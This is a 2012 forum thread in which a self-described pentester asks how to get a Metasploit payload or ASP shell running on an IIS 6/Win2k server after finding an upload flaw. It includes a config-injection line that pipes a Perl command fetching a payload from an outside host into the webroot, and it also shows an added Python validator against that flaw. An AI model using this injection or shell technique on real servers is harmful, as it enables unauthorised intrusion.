
Executing metasploit payload uploaded by IIS guest


Bluecifer

Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 12:19 am

Executing metasploit payload uploaded by IIS guest

Hello all,

Fairly new pentester here, having issues executing a metasploit payload uploaded by the IIS guest account. All payloads seem to fail, or do not have adequate permissions to execute.

Background on target:
IIS 6 running on Win2kSP2 with ASP. The IIS guest account has read/write/execute. I can upload a file through a vulnerability I discovered, however I cannot execute. If for example I upload an ASP shell, I receive an error saying access denied on line etc (which is at the end of the payload). I have verified ASP scripts can run by uploading something simple like document.write("hello"). Maybe I can use a different payload?

Any ideas here or suggested reading you can point me to?
Last edited by Bluecifer on Wed Dec 05, 2012 12:24 am, edited 1 time in total.

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Dec 05, 2012 12:52 am

Re: Executing metasploit payload uploaded by IIS guest

Are you uploading the exploit via webdav? Maybe some characters are getting removed or modified in transit. Are you performing any sort of encoding?

And yes, maybe try another payload, such as a bind or reverse shell. I assume you're trying Meterpreter?
The day you stop learning is the day you start becoming obsolete.

Bluecifer

Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 1:14 am

Re: Executing metasploit payload uploaded by IIS guest

Thank you for the reply. I am able to upload via writing a small perl script. The application fails to validate the location of the configuration file, and an attacker can specify an extra "\" and the server will read the config file via smb or webdav. The configuration file specifies the location of the logfile. For example:

  Code:
LogFile= perl -e "use LWP::Simple; getstore('http://192.168.2.4/payload', 'C:\inetpub\wwwroot\payload');" |


Once uploaded though I cannot take advantage of exec() or system() with perl, (you can run logfile script multiple times) as the IIS account appears to not have the proper permissions to execute cmd.exe. When I tested in a lab environment, and changed permissions of cmd.exe to 'everyone', I was able to get a shell. This also appears to be the same problem with the metasploit payloads as well (cmd.exe).

I guess what I am asking is what do you do when pentesting an app running on IIS since it uses the guest account? Maybe I need some other creativity (look for other files containing passwords, etc). Any ideas? Just looking for other opinions or ideas.

Thanks!
Last edited by Bluecifer on Wed Dec 05, 2012 1:18 am, edited 1 time in total.
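
A defensive counterpart to the flaw described in the post above, as an added example that is not part of the original thread or the application's own code: validate the configuration path and the `LogFile` value before using them. The directory names and function names are hypothetical, and it is an assumption that the application opens `LogFile` with Perl's two-argument `open()`, which treats a value ending in `|` as a command to run.

```python
import ntpath  # Windows path rules, usable on any platform

# Hypothetical install layout; the thread does not name the real directories.
CONFIG_DIR = r"C:\app\conf"
LOG_DIR = r"C:\app\logs"

# Characters that turn a "file name" into a command or redirection when the
# value reaches a shell or Perl's two-argument open().
FORBIDDEN = set('|<>&;"\'`')


def _is_remote(path: str) -> bool:
    # UNC and device paths start with two separators after normalising '/'.
    return path.replace("/", "\\").startswith("\\\\")


def _inside(base: str, path: str) -> bool:
    # Resolve '..' and drive changes, then require the result to stay under
    # base. Comparison is case-insensitive, as on NTFS.
    base_n = ntpath.normcase(ntpath.normpath(base))
    full = ntpath.normcase(ntpath.normpath(ntpath.join(base, path)))
    return full.startswith(base_n + "\\")


def check_config_path(path: str) -> bool:
    """Accept only a local configuration file under CONFIG_DIR."""
    p = path.strip()
    return bool(p) and not _is_remote(p) and _inside(CONFIG_DIR, p)


def check_logfile_value(value: str) -> bool:
    """Accept only a plain local file under LOG_DIR, never a command string."""
    v = value.strip()
    if not v or FORBIDDEN & set(v):
        return False
    return not _is_remote(v) and _inside(LOG_DIR, v)


if __name__ == "__main__":
    # Constructed sample inputs.
    for sample in ["app.ini", r"\\192.168.2.4\share\app.ini", r"..\..\boot.ini"]:
        print("config ", repr(sample), check_config_path(sample))
    for sample in ["access.log", 'perl -e "..." |', r"C:\inetpub\wwwroot\x"]:
        print("logfile", repr(sample), check_logfile_value(sample))
```
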

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Dec 05, 2012 2:22 am

Re: Executing metasploit payload uploaded by IIS guest

I'm really not familiar with running Perl on IIS. I'd set up a test system locally in a VM and see what you can work out there. That's usually a better plan than trial-and-error on a remote system. That'll allow you to see the log files, event logs, etc. and determine where the problem lies.

However, the restricted guest account should be able to run commands, especially as far back as Win2k. There may be Perl configuration settings that prevent this, but that account can certainly get a shell; I've done so numerous times via ASP. You're not going to be able to perform privileged operations (i.e. adding users), but that's not going to prevent you from running general commands.

Here's an ASP example: http://carnal0wnage.attackresearch.com/ ... ebdav.html Some parts are different than the technique you're using, but maybe try creating an ASP file via msfpayload/msfencode/msfvenom or use something out of: http://laudanum.inguardians.com/
The day you stop learning is the day you start becoming obsolete.

Bluecifer

Newbie

Posts: 3

Joined: Wed Dec 05, 2012 12:03 am

Post Wed Dec 05, 2012 2:55 pm

Re: Executing metasploit payload uploaded by IIS guest

Thanks again for the reply. I hit the 'Googles' and was able to find an interesting article giving an example of uploading your own "cmd.exe" to overcome the issue I was having. Rewrote the ASP script to point to my cmd.exe and was able to get "network service" level privileges.
